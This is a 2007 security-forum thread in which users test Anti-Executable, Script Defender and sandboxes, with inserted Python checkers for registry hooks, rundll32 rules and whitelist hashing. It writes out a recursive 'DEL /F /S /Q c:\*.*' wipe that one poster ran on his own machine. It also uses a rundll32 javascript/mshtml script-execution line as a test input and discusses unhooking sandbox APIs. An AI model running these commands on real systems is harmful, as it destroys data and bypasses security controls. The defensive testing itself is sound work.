If I d-click to open this .bat file, SD alerts, because SD has modified
the Registry entry for 'batfile' so as to "intercept" the Open Command:
http://www.urs2.net/rsj/computing/imgs/bat_reg.gif
_________________________________________________________________________________________
http://www.urs2.net/rsj/computing/imgs/bat_2.gif
One weakness in this type of program is that you can run the file from a Command Prompt
and SD does not intercept because in using the Command Prompt, Windows File Association
does not come into play. Cmd.exe interprets the file directly:
http://www.urs2.net/rsj/computing/imgs/bat_3.gif
Trojans have been known to run scripts using cmd.exe. So, you ask yourself, could a trojan executable get past your defense?
Now that you know what the program protects against, your immediate question should be, under what circumstances would I d-click on a script file?
You would also know that your system currently has no malicious script files on it, so the next question would be, under what circumstances would another script file get on to the HD? And would you d-click it?
Most likely source would be in an email attachment. Would you open it? (We are not considering browser caching here, since SD doesn't deal with that)
With this type of analysis (for any security program), you have information on which to base your decision as to whether or not this program is necessary, or adds anything significant to your set up.
regards,
-rich
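Rich's registry walk-through above, as an added example that is not part of the thread or of Script Defender: a small Python checker that parses a Registry Editor export (a constructed one is embedded) and reports, for .bat, .js and .vbs, whether the Open handler is the stock one, a known interceptor hook (the name SDefender.exe is an assumed stand-in for Script Defender) or something else. The expected-handler table is an assumption about XP defaults; nothing touches a live registry, so it runs anywhere.

```python
"""Audit script file associations from a Registry Editor (.reg) export.

Added example, not code from the thread or from Script Defender. It
models the hook Rich shows (the Open command of HKCR\batfile rewritten
to point at an interceptor) and flags any handler that is neither the
stock one nor the known interceptor. The input is a constructed export;
nothing touches a live registry, so this also runs on non-Windows hosts.
"""
import re
from typing import Dict, Tuple

# Constructed sample export. batfile is hooked by a hypothetical
# SDefender.exe (stand-in for Script Defender), JSFile has been pointed
# at a loader in a user-writable folder, VBSFile is untouched.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.bat]
@="batfile"

[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="\"C:\\Program Files\\SDefender\\SDefender.exe\" \"%1\" %*"

[HKEY_CLASSES_ROOT\.js]
@="JSFile"

[HKEY_CLASSES_ROOT\JSFile\shell\open\command]
@="\"C:\\Users\\Public\\loader.exe\" \"%1\" %*"

[HKEY_CLASSES_ROOT\.vbs]
@="VBSFile"

[HKEY_CLASSES_ROOT\VBSFile\shell\open\command]
@="\"%SystemRoot%\\System32\\WScript.exe\" \"%1\" %*"
'''

# Stock handler program per ProgID (assumed XP defaults). A batfile
# command is just "%1" %*: the shell hands the file to cmd.exe itself,
# so the expected wrapper program is the empty string.
EXPECTED = {"batfile": "", "jsfile": "wscript.exe", "vbsfile": "wscript.exe"}
INTERCEPTORS = {"sdefender.exe"}   # assumed interceptor binary name

def unescape(s: str) -> str:
    """Undo the escaping of backslash and double quote in a REG_SZ value."""
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a 'Windows Registry Editor Version 5.00' export into
    {lowercase key path: {value name ('' = default): string value}}.
    Only REG_SZ lines are handled; other value types are skipped."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    value_line = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=("(?:[^"\\]|\\.)*")$')
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None:
            m = value_line.match(line)
            if m:
                name = "" if m.group(1) == "@" else unescape(m.group(1)[1:-1])
                keys[current][name] = unescape(m.group(2)[1:-1])
    return keys

def open_handler(keys: Dict[str, Dict[str, str]], ext: str) -> Tuple[str, str]:
    """Follow .ext -> ProgID -> shell\\open\\command and return
    (ProgID, lowercase basename of the program that runs). '' means the
    command starts with the file itself ("%1"), i.e. no wrapper program."""
    progid = keys.get("hkey_classes_root\\" + ext.lower(), {}).get("", "")
    cmd_key = "hkey_classes_root\\" + progid.lower() + "\\shell\\open\\command"
    cmd = keys.get(cmd_key, {}).get("", "")
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmd)
    first = (m.group(1) or m.group(2)) if m else ""
    if first in ("%1", "%L", ""):
        return progid, ""
    return progid, first.rsplit("\\", 1)[-1].lower()

def audit(text: str, exts=(".bat", ".js", ".vbs")) -> Dict[str, str]:
    """'stock', 'intercepted' (known defender hook), 'redirected' or 'missing'."""
    keys = parse_reg(text)
    verdicts = {}
    for ext in exts:
        progid, program = open_handler(keys, ext)
        if not progid:
            verdicts[ext] = "missing"
        elif program == EXPECTED.get(progid.lower()):
            verdicts[ext] = "stock"
        elif program in INTERCEPTORS:
            verdicts[ext] = "intercepted"
        else:
            verdicts[ext] = "redirected"
    return verdicts

if __name__ == "__main__":
    for ext, verdict in audit(SAMPLE_REG).items():
        print(f"{ext:5} {verdict}")
```

The association is only consulted by ShellExecute, that is by a double-click or Start > Run on the file; `cmd /c 1.bat` reads the file itself and never looks at HKCR\batfile, which is the bypass Rich demonstrates. The same check catches the opposite case too, where malware rather than a defender has rewritten a handler, which is what the JSFile entry in the sample shows.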
flinchlock
May 17th, 2007, 06:53 AM
Does AE stop batch (.bat) or executable (.exe and .com - 16-bit/32-bit) files from running when started from the "Command Prompt" (cmd.exe) window?
What does AE do if you run Rich's "1.bat" file?
If you take notepad.exe and copy it to a new name, for example, badguy.exe, and run badguy.exe from the "Command Prompt", does AE allow it to run?
Mike
EASTER.2010
May 17th, 2007, 07:29 AM
I ran a rootkit once at a time when at the same time it rendered the command prompt completely useless and thus prevented running ANY command line rootkit detectors. That prompted me afterwards to look for an alternative CMD program to serve as an emergency solution to this and also renamed CMD or something on the order of DMC.exe to overcome that disabling method.
Peter2150
May 17th, 2007, 09:26 AM
I think one place that AE may fall short is with something like Rundll32.exe. The problem is once it is generically allowed, it can install any DLL. I used to like the way SSM handled it in the pop up, but now they changed it to rule based and it's way too complicated. KAV in the AIC module of the Proactive Defense is now handling it the way I feel comfortable. It asks for permission to run Rundll32.exe and once allowed it then gives the option to select either for everything(like AE) or just for that DLL module. The latter is preferable.
Good for the novice user, probably questionable
Pete
Rmus
May 17th, 2007, 11:27 AM
-{ Quote: "I think one place that AE may fall short is with something like Rundll32.exe. The problem is once it is generically allowed, it can install any DLL. " }-I take this to mean that because rundll32.exe is White Listed, a malicious file installed could use it to install any dll.
The malicious file could not install with AE enabled.
Now, if AE is disabled to install a program and it turns out to be malicious, then with AE re-enabled, the malicious file could indeed allow the above scenario to happen.
At this point you need a behavior blocker or such to catch the activity.
AE will not do this because it is not a behavior blocker. So it's not fair to say "it may fall short" since that is not its job.
If the above scenario with rundll32.exe is of concern, then, of course, you need something else in place to monitor it.
regards,
-rich
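Pete's rundll32.exe point and Rich's answer, as an added example (not code from AE, SSM or KAV): two allow decisions for the same command line, the generic one an executable whitelist makes once rundll32.exe itself is trusted, and a per-module one of the kind Pete prefers, which pins the full DLL path and entry point. The allow list, the install path of rundll32.exe and the sample command lines are constructed.

```python
"""Generic versus per-module allow decisions for rundll32.exe.

Added example, not code from AE, SSM or KAV. An executable whitelist
trusts rundll32.exe as a file, so every DLL it is asked to load is
allowed (Pete's objection). The per-module rule below parses the
command line and allows only pinned (full DLL path, entry point) pairs.
Allow list, paths and sample command lines are constructed.
"""
import re
from typing import Dict, Optional, Set, Tuple

SYSTEM32 = r"c:\windows\system32"   # assumed rundll32.exe install directory

# Constructed allow list: lowercase full module path -> entry points.
ALLOWED: Dict[str, Set[str]] = {
    SYSTEM32 + r"\shell32.dll": {"control_rundll", "openas_rundll"},
    r"c:\program files\app\good.dll": {"init"},   # hypothetical vendor DLL
}

_FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', re.S)
_MODULE_ENTRY = re.compile(r'(?:"([^"]+)"|([^,\s]+))\s*,\s*(\S+)')
_PLAIN_DLL = re.compile(r'(?:[a-z]:\\)?[^:*?<>|]*\.dll')

def _exe_basename(cmdline: str) -> Tuple[str, str]:
    """Return (lowercase basename of the program token, remaining args)."""
    m = _FIRST_TOKEN.match(cmdline)
    if not m:
        return "", ""
    exe = (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()
    return exe, m.group(3)

def generic_allow(cmdline: str) -> bool:
    """What a file whitelist sees: the program is rundll32.exe, which is
    on the list, so the command line is allowed whatever the DLL is."""
    return _exe_basename(cmdline)[0] in ("rundll32.exe", "rundll32")

def parse_rundll32(cmdline: str) -> Optional[Tuple[str, str]]:
    """Split 'rundll32.exe <module>,<entry> [args]' into a normalised
    (lowercase full module path, lowercase entry point). Returns None if
    the program is not rundll32 or the module is not a plain .dll path,
    so forms like javascript:"\\..\\mshtml,RunHTMLApplication" are
    refused rather than guessed at."""
    exe, rest = _exe_basename(cmdline)
    if exe not in ("rundll32.exe", "rundll32"):
        return None
    m = _MODULE_ENTRY.match(rest)
    if not m:
        return None
    module = (m.group(1) or m.group(2)).lower()
    entry = m.group(3).lower()
    if not _PLAIN_DLL.fullmatch(module):
        return None
    if "\\" not in module:
        # A bare name is resolved from rundll32's own directory first.
        module = SYSTEM32 + "\\" + module
    return module, entry

def per_module_allow(cmdline: str, allowed: Dict[str, Set[str]] = ALLOWED) -> bool:
    """Allow only a listed (module path, entry point) pair; anything the
    parser refuses is denied, not passed through."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return False
    module, entry = parsed
    return entry in allowed.get(module, set())

if __name__ == "__main__":
    for cmd in (r'rundll32.exe shell32.dll,Control_RunDLL',
                r'rundll32.exe C:\Users\Public\evil.dll,Start',
                r'rundll32.exe C:\Users\Public\shell32.dll,Control_RunDLL',
                r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(1)'):
        print(f"generic={generic_allow(cmd)!s:5} per_module={per_module_allow(cmd)!s:5} {cmd}")
```

Pinning the full path matters as much as the entry point: a DLL named shell32.dll dropped in a user-writable folder is denied, while the bare name is resolved against rundll32's own directory, which is where the genuine copy lives.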
Rmus
May 17th, 2007, 11:37 AM
-{ Quote: "Does AE stop batch (.bat) or executable (.exe and .com - 16-bit/32-bit) files from running when started from the "Command Prompt" (cmd.exe) window?
What does AE do if you run Rich's "1.bat" file?" }-*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt inless you've got some way of blocking cmd.exe from running, or a way of intercepting it.
-{ Quote: "If you take notepad.exe and copy it to a new name, for example, badguy.exe, and run badguy.exe from the "Command Prompt", does AE allow it to run?" }-What do you think will happen?
regards,
-rich
flinchlock
May 17th, 2007, 11:54 AM
-{ Quote: "*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt unless you've got some way of blocking cmd.exe from running, or a way of intercepting it." }-OK
-{ Quote: "What do you think will happen?" }-I have no actual knowledge/use of AE, so I will guess AE will ask about a child process (badguy.exe) started by parent process (cmd.exe)???
Mike
Rmus
May 17th, 2007, 12:34 PM
No, AE's only function is to say "NO" when you attempt to install an executable not already on the White List. Processes and stuff is the job of HIPS and similar programs.
In your example, the "copy" command just creates a copy of the file with a new name, but the original file remains:
http://www.urs2.net/rsj/computing/imgs/notepad_1.gif
However, if you use the "Rename" command, DOS actually deletes the old file and creates a new renamed file, which AE blocks:
http://www.urs2.net/rsj/computing/imgs/notepad_2.gif
Also, AE would block moving the file, because the "Move" command actually involves copying the file to a new location and then deleting the original:
http://www.urs2.net/rsj/computing/imgs/notepad_3.gif
This protection is an added feature to keep someone from inadvertently deleting an executable - in situations where children use the family computer, etc.
In suggesting examples involving processes, the assumption is that some malware has installed and is using cmd.exe to start a child process.
AE would block the installation of the malware, except in the instance I cited above in answer to Pete.
regards,
-rich
ErikAlbert
May 17th, 2007, 01:31 PM
I keep AE anyway. I knew in advance that AE wouldn't protect me completely, that is common for all security softwares. What about scanners ? Are they so perfect in protecting your computer ???
I probably need an additional security software that blocks on suspicious behaviour, maybe not. ?
PS: Keep in mind that I also boot-to-restore, which is a killer of any infection. I only need security to save the day, they don't need to be perfect, because they aren't perfect.
flinchlock
May 17th, 2007, 02:43 PM
-{ Quote: "No, AE's only function is to say "NO" when you attempt to install an executable not already on the White List.
AE would block the installation of the malware" }-What definition does AE think "install" is? When I think of "install", I think of creating folders, add an uninstall entry to the registry, register some dlls, etc.
-{ Quote: "*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt inless you've got some way of blocking cmd.exe from running, or a way of intercepting it." }-Let me change my mind how I answered that question, instead of my "No" answer.
So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?
-{ Quote: "run badguy.exe from the "Command Prompt", does AE allow it to run?" }-What was the answer to this?
Mike
Rmus
May 17th, 2007, 03:52 PM
-{ Quote: "What definition does AE think "install" is? When I think of "install", I think of creating folders, add an uninstall entry to the registry, register some dlls, etc." }-See here for some examples of "install."
Anti-Executable Tests (http://urs2.net/rsj/computing/tests/AE_install/)
-{ Quote: "
Let me change my mind how I answered that question, instead of my "No" answer.
So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?
" }-AE would block any executable file from being deleted. I changed your command
to include just *.exe to save me a reboot-to-restore:
http://www.urs2.net/rsj/computing/imgs/AE_delete.gif
________________________________________________________________________
Question: Except that I did it as a test, How could that command get executed on my computer? I'm not sure what your point is.
-{ Quote: "run badguy.exe from the "Command Prompt", does AE allow it to run?" }-Yes, because it is a copy of the original file, notepad.exe.
Question: Except that I did it as a test, How could that file have gotten copied on my computer? I'm not sure what your point is.
regards,
-rich
ErikAlbert
May 17th, 2007, 04:57 PM
-{ Quote: "So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?" }-
In order to test my total recovery solution, I ran this command and it deleted MANY files in my ON-LINE snapshot.
I didn't use a .bat file. I typed everything manual.
After I rebooted my computer, the FDISR Splash Screen appeared, I could boot in my OFF-LINE snapshot, but I couldn't get to the FDISR's main menu. So the FDISR-icon didn't work anymore.
So I tried to boot in my ON-LINE snapshot and I got this error message :
Windows could not start because the following file is missing or corrupt :
<Windows root>\system32\hal.dll.
Please re-install a copy of the above file.
This message indicates that FDISR is corrupted and that means I have to start plan B, because plan A failed.
I consider this as normal, because plan A and B = total recovery solution.
Plan B :
I restored my system partition with an IMAGE and I was back in business.
Conclusion : this was a successful recovery. :)
nicM
May 17th, 2007, 08:12 PM
-{ Quote: "Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-
This was probably already said in this thread (didn't read everything yet), but yes, some malware can do their job even if isolated : Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sandbox program do have network control.
ErikAlbert
May 17th, 2007, 08:23 PM
-{ Quote: "This was probably already said in this thread (didn't read everything yet), but yes, some malware can do their job even if isolated : Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sandbox program do have network control." }-
Thanks nicM, I knew there was something wrong with these isolated infections.
As long as the damage is on the harddisk and nothing more than that, then isolation works, but not in your examples.
Do you have a cure for this ? Firewall ? I don't know much about anything.
flinchlock
May 17th, 2007, 09:04 PM
-{ Quote: "See here for some examples of "install."
Anti-Executable Tests (http://urs2.net/rsj/computing/tests/AE_install/)" }-OK
-{ Quote: "Question: Except that I did it as a test, How could that command get executed on my computer? I'm not sure what your point is." }-My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do. I was trying to find out if cmd.exe can fork a system up... it appears it can.
-{ Quote: "Yes, because it is a copy of the original file, notepad.exe." }-Since AE does this-{ Quote: "Anti-Executable verifies a file in five ways:
* File Size
* File Type (extension)
* File Location
* Creation Date
* Code Sample" }-Hmmm, does not check the file name or a hash?
-{ Quote: "Question: Except that I did it as a test, How could that file have gotten copied on my computer? I'm not sure what your point is." }-My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do. :)
I can make up a example of how that command could be ran on your system...
Some Wilders user by the name of "BMF2THEMAX" starts posting/asking questions for say, six months. He/she will appear to be just another confused/ignorant user. After six months and a couple hundred posts, he/she says there is this great new program called CYA-XSS that is wonderful, bla, bla, bla. So, everyone downloads it, and sure enough, it does a few good things. Everyone starts to complain that it does not do xyz. So, an updated CYA-XSS v1.01 is posted. Everyone downloads the updated program. The program waits for 3.14 days, and then creates/spawns a process that runs that DEL command.
I have no clue how a program could do anything on your system if AE is installed... I have not used/seen/tested/studied/researched/etc AE.
I am just another confused/ignorant user asking the same stupid questions over and over and over again.
Mike
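Mike's question whether AE checks a hash, as an added example that is not AE's code: a toy whitelist that records the five attributes quoted above (size, extension, location, creation date, and a code sample, assumed here to be the first 256 bytes) beside one that records a SHA-256 of the whole file, then runs both over a renamed copy, a moved copy and two same-size patches. The files are in-memory records built in the block; notepad.exe is a constructed stand-in, not the real binary.

```python
"""Metadata-based versus hash-based recognition of a whitelisted file.

Added example, not AE's code. The metadata check models the five items
quoted in the thread (size, extension, location, creation date, code
sample); the 'code sample' is assumed to be the first 256 bytes. Files
are in-memory records built below, so nothing is read from disk.
"""
import hashlib
from dataclasses import dataclass, replace
from typing import Iterable, Tuple

SAMPLE_BYTES = 256   # assumed length of the sampled region

@dataclass(frozen=True)
class FileRecord:
    path: str        # full path; 'location' is the directory part
    created: int     # creation time as a constructed timestamp
    content: bytes

    @property
    def location(self) -> str:
        return self.path.rsplit("\\", 1)[0].lower()

    @property
    def ext(self) -> str:
        return self.path.rsplit(".", 1)[-1].lower()

def metadata_fingerprint(f: FileRecord) -> Tuple:
    """Size, type, location, creation date and the sampled bytes."""
    return (len(f.content), f.ext, f.location, f.created, f.content[:SAMPLE_BYTES])

def hash_fingerprint(f: FileRecord) -> str:
    """SHA-256 of the entire content."""
    return hashlib.sha256(f.content).hexdigest()

class Whitelist:
    def __init__(self, files: Iterable[FileRecord]):
        files = list(files)
        self.meta = {metadata_fingerprint(f) for f in files}
        self.hashes = {hash_fingerprint(f) for f in files}

    def allowed_by_metadata(self, f: FileRecord) -> bool:
        return metadata_fingerprint(f) in self.meta

    def allowed_by_hash(self, f: FileRecord) -> bool:
        return hash_fingerprint(f) in self.hashes

# Constructed stand-in for notepad.exe: a two-byte 'MZ' tag followed by
# 4 KiB of filler, so patches can land inside or outside the sample.
NOTEPAD = FileRecord(r"C:\Windows\System32\notepad.exe", 1_100_000_000,
                     b"MZ" + bytes(range(256)) * 16)
WHITELIST = Whitelist([NOTEPAD])

def copy_as(f: FileRecord, new_path: str) -> FileRecord:
    """'copy notepad.exe badguy.exe': identical bytes under a new name.
    The creation date is kept; whether a real copy keeps it depends on
    the tool used, which is an assumption here."""
    return replace(f, path=new_path)

def patch_byte(f: FileRecord, offset: int, value: int) -> FileRecord:
    """Same-size in-place modification: size, type, location and date
    stay unchanged; only the content (and maybe the sample) differs."""
    data = bytearray(f.content)
    data[offset] = value
    return replace(f, content=bytes(data))

if __name__ == "__main__":
    cases = {
        "renamed copy": copy_as(NOTEPAD, r"C:\Windows\System32\badguy.exe"),
        "copy moved to Public": copy_as(NOTEPAD, r"C:\Users\Public\notepad.exe"),
        "patched at offset 10": patch_byte(NOTEPAD, 10, 0x90),
        "patched at offset 1000": patch_byte(NOTEPAD, 1000, 0x90),
    }
    for name, rec in cases.items():
        print(f"{name:24} metadata={WHITELIST.allowed_by_metadata(rec)!s:5} "
              f"hash={WHITELIST.allowed_by_hash(rec)}")
```

The renamed copy passes both checks, which is Rich's point: a whitelist that looks at content cannot tell badguy.exe from notepad.exe, and is not meant to. Where the two approaches part ways is a same-size modification outside the sampled bytes: the metadata check still accepts it, the hash does not, while a patch inside the sample fails both.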
Rmus
May 17th, 2007, 09:08 PM
-{ Quote: " Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sndbox program do have network control." }-
-{ Quote: "Do you have a cure for this ? Firewall ? I don't know much about anything." }-You know much more than you think.
First, ask yourself how this trojan "Ldpinch" would get past your security wall and become installed.
Look again at the ways trojans get installed, and see if you think you have a vulnerability.
Next, look carefully at nicM's statement:
-{ Quote: "...will upload your passwords, files, or anything they are designed to steal" }-You've said in previous posts that your bank password, for example, constantly changes, and that you keep no personal data in files on your computer.
You mention firewall. I assume yours has outbound protection, so that if such a trojan should install, the attempt to connect to the trojans server will be blocked, as here:
Firewall Alert (http://urs2.net/rsj/computing/tests/Kerio-alerts2/)
After thinking through all of this, decide if something more needs to be added to what you already have.
regards,
-rich
flinchlock
May 17th, 2007, 09:18 PM
-{ Quote: "After I rebooted my computer, the FDISR Splash Screen appeared <snip>" }-This indicates the MBR (Master Boot Record) was not damaged, and the PBR (Partition Boot Record) also was not damaged. FD-ISR (version 3.20 Build 202) does use the PBR for its menu.
-{ Quote: "So I tried to boot in my ON-LINE snapshot and I got this error message :
Windows could not start because the following file is missing or corrupt :
<Windows root>\system32\hal.dll.
Please re-install a copy of the above file.
This message indicates that FDISR is corrupted <snip>" }-Nope, indicates a problem that XP could not find one of the required files to start the boot process.
Here is the XP/W2K boot process...
1) BIOS loads MBR
2) MBR starts %SystemDrive%\ntldr
3) ntldr reads %SystemDrive%\boot.ini and puts up the boot menu
4) selecting a XP/W2K choice from menu causes ntldr to run %SystemDrive%\ntdetect.com to get hardware info
5) ntldr then loads %SystemRoot%\system32\ntoskrnl.exe and %SystemRoot%\system32\hal.dll (fyi: HAL = Hardware Abstraction Layer)
.
.
.
So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%\system32\ntoskrnl.exe, BUT NOT %SystemRoot%\system32\hal.dll.
Mike
Rmus
May 17th, 2007, 09:29 PM
-{ Quote: "OK
My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do...I am just another confused/ignorant user asking the same stupid questions over and over and over again." }-Hello, Mike,
Why not download an evaluation version and run some tests! Old adage in one of my lines of work:
-{ Quote: "Careful photographers run their own tests" }-It's fine to ask for opinions and look at others' tests, but I don't think you will be satisfied until you prove for yourself what you are looking for :)
-{ Quote: " I was trying to find out if cmd.exe can fork a system up... it appears it can." }-Only if you have permitted some bad file to install and become White Listed and then invoke cmd.exe.
-{ Quote: "Since AE does this... Hmmm, does not check the file name or a hash?" }-I assume a copy of a file has the same hash.
-{ Quote: "I can make up an example of how that command could be run on your system...
Some Wilders user by the name of "BMF2THEMAX" starts posting/asking questions for say, six months. He/she will appear to be just another confused/ignorant user. After six months and a couple hundred posts, he/she says there is this great new program called CYA-XSS that is wonderful, bla, bla, bla. So, everyone downloads it, and sure enough, it does a few good things. Everyone starts to complain that it does not do xyz. So, an updated CYA-XSS v1.01 is posted. Everyone downloads the updated program. The program waits for 3.14 days, and then creates/spawns a process that runs that DEL command." }-Interesting scenario. I really wonder if it would fly here at Wilders?
First of all, I already demonstrated that AE would prevent that DEL command from deleting executable files. Assuming your scenario where the process runs DEL, as soon as the AE alert popped up, the user would know something weird is going on.
Second, many here at Wilders run programs that would probably catch this process - they will have to confirm that.
Finally, I would guess that everyone here at Wilders has some restore program that would quickly revert the system back to its original state - as Erik did - since that DEL command would trash non-executable files.
regards,
-rich
ErikAlbert
May 17th, 2007, 09:32 PM
-{ Quote: "
So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%\system32\ntoskrnl.exe, BUT NOT %SystemRoot%\system32\hal.dll.
" }-
I'm not sure it didn't protect hal.dll.
I could boot in my ON-LINE snapshot the first time, but I ran DEL a second time and this was maybe too much.
I will redo the test tomorrow and see what happens when I run DEL only one time.
I was only interested in my recovery solution, not the consequences of running DEL.
Rmus
May 17th, 2007, 09:40 PM
-{ Quote: "So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%\system32\ntoskrnl.exe, BUT NOT %SystemRoot%\system32\hal.dll. Mike" }-Without doing forensics on the HD before it was restored, you can't be sure of the reason, and anything else is conjecture.
I'm sure it wasn't because the file was deleted:
http://www.urs2.net/rsj/computing/imgs/AE_delete-1.gif
EDIT: [remove comments] -- after viewing Erik's last post, I see he omitted an important point in his first post,
so we will have to wait until he runs this test again for clarification.
regards,
-rich
ErikAlbert
May 17th, 2007, 09:46 PM
-{ Quote: "Without doing a forensic on the HD before it was restored, You can't be sure of the reason, and anything else is conjecture.
I'm sure it wasn't because the file was deleted:
http://www.urs2.net/rsj/computing/imgs/AE_delete-1.gif" }-
This means that hal.dll was still there, because I could boot in my ON-LINE snapshot the first time, which was seriously damaged by DEL and recovered by FDISR.
But I ran DEL a second time after booting in my ON-LINE snapshot and that was probably too much. I will redo the test to be sure.
There could be another reason : the Delete Prevention of my AE isn't marked.
interact
May 17th, 2007, 10:37 PM
Virtualization is useless against new threats as many A/V researchers are finding out. A good virus writer can exploit the exception handling in a VM application to detect if their malicious code is running in a VM. The code behaves itself while in the VM and then causes mischief when it's on your "real" PC.
A criminal will behave while under the watchful eye of a parole officer then re-offend when it ends.
~interact
ErikAlbert
May 17th, 2007, 11:56 PM
The second test corrupted FDISR also, because of the missing hal.dll.
I also got another message :
Windows cannot find C:\$ISR\$APP\ISRWait.exe
The main reason why it didn't work is that I disabled the "Delete Prevention" (and "Copy Prevention") in my Anti-Executable.
So Anti-Executable is also active in the CMD-window, which is very good.
My on-line snapshot was completely restored, but FDISR itself didn't work anymore.
I can't enable "Delete Prevention" (and "Copy Prevention"), because it causes errors in the Copy/Update function of FDISR.
I don't need both functions, because my boot-to-restore is supposed to take care of this.
This kind of disaster is included in my recovery solution, so it doesn't matter.
Even a zero-ed harddisk can be recovered this way.
lucas1985
May 18th, 2007, 01:00 AM
-{ Quote: "Virtualization is useless against new threats as many A/V researchers are finding out. A good virus writer can exploit the exception handling in a VM application to detect if their malicious code is running in a VM. The code behaves itself while in the VM and then causes mischief when it's on your "real" PC.
A criminal will behave while under the watchful eye of a parole officer then re-offend when it ends.
" }-
It's true that some sophisticated malware can detect if it's running on a VM (VMware or the code emulator of an AV engine) and behave in a harmless way until it's executed in a real system.
Go to this page (http://pferrie.tripod.com) made by Peter Ferrie (Symantec researcher) and download a Powerpoint presentation called: "Attacks on Virtual Machines v2 (slides)"
However, the virtualization discussed in this thread refers mainly to sandboxes, which do virtualization in a different way (kernel driver and API hooking) than VMware (full emulation of hardware).
The main worries are:
- Can isolated malware leak outside the sandbox?
- Can isolated malware access confidential files and send private data to a remote server?
flinchlock
May 18th, 2007, 06:36 AM
When I clicked on Powerpoint presentation (http://pferrie.tripod.com/papers/attacks2.ppt), I got this error:-{ Quote: "This file is hosted by Tripod, a Lycos®Network Site, and is not available for download. Please check out Tripod's Help system for more information about Remote Loading and our Remote Loading policy." }-
I had to go to Peter Ferrie's home page first http://pferrie.tripod.com and then click on the Attacks on Virtual Machines v2 (slides) (http://pferrie.tripod.com/papers/attacks2.ppt) link.
Mike
interact
May 18th, 2007, 01:32 PM
Lucas1985,
One area that I'm currently investigating is to see if API hooks can be rehooked at the kernel level. Many sandboxes / HIP tools use API hooking to detect process starts. If the hook can be removed then it's goodbye to the sandbox and hello hard disc. It's also worth noting that I'm told a process can be started from kernel mode rather than user mode. I've no idea what impact this would have on a sandbox as it may not see a malware process start.
~interact
Pedro
May 18th, 2007, 02:46 PM
-{ Quote: "Lucas1985,
One area that I'm currently investigating is to see if API hooks can be rehooked at the kernel level. Many sandboxes / HIP tools use API hooking to detect process starts. If the hook can be removed then it's goodbye to the sandbox and hello hard disc. It's also worth noting that I'm told a process can be started from kernel mode rather than user mode. I've no idea what impact this would have on a sandbox as it may not see a malware process start.
~interact" }-
How does a process even begin to do those things?
"If the hook can be removed" - How?
I've seen the creator of SandboxIE ask people how. No one answers him. He asks for details, to patch any vulnerabilities. He doesn't doubt there could be vulnerabilities, but he does ask how. He hears crickets.
interact
May 18th, 2007, 03:53 PM
Pedro,
Here's an interesting article (8.5 MB) that got me thinking about doing my own investigations into removing API hooks.
http://www.packetstormsecurity.org/hitb04/hitb04-chew-keong-tan.pdf
I think once this ideology becomes more prevalent in malware then any security tool that uses API hooking could be in trouble.
If you're interested in starting a process from kernel mode then I have further info.
~interact
lucas1985
May 18th, 2007, 04:15 PM
-{ Quote: "When I clicked on Powerpoint presentation (http://pferrie.tripod.com/papers/attacks2.ppt), I got this error:
-{ Quote: "
This file is hosted by Tripod, a Lycos®Network Site, and is not available for download. Please check out Tripod's Help system for more information about Remote Loading and our Remote Loading policy.
" }-
I had to go to Peter Ferrie's home page first http://pferrie.tripod.com and then click on the Attacks on Virtual Machines v2 (slides) (http://pferrie.tripod.com/papers/attacks2.ppt) link." }-
Thanks flinchlock. I should have checked the link ;D
Fixed.
-{ Quote: "If you're interested in starting process from kernel mode then I have further info." }-
If it's possible to start a new process from kernel mode without receiving a prompt from a HIPS, then almost all HIPS and reboot-to-restore solutions will become useless.
Rmus
May 18th, 2007, 04:37 PM
-{ Quote: " The code behaves itself while in the VM and then causes mischief when it's on your "real" PC...
If the hook can be removed then it's goodbye to the sandbox and hello hard disc. " }-
-{ Quote: "If it's possible to start a new process from kernel mode without receiving a prompt from a HIPS, then almost all HIPS and reboot-to-restore solutions will become useless." }-Hello Lucas,
I don't see the connection between VM/sandbox and reboot-to-restore program. Anything that makes changes to the HD will be gone using a reboot-to-restore solution.
regards,
-rich
Pedro
May 18th, 2007, 04:53 PM
-{ Quote: "
Here's an interesting article (8.5 MB) that got me thinking about doing my own investigations into removing API hooks.
http://www.packetstormsecurity.org/hitb04/hitb04-chew-keong-tan.pdf
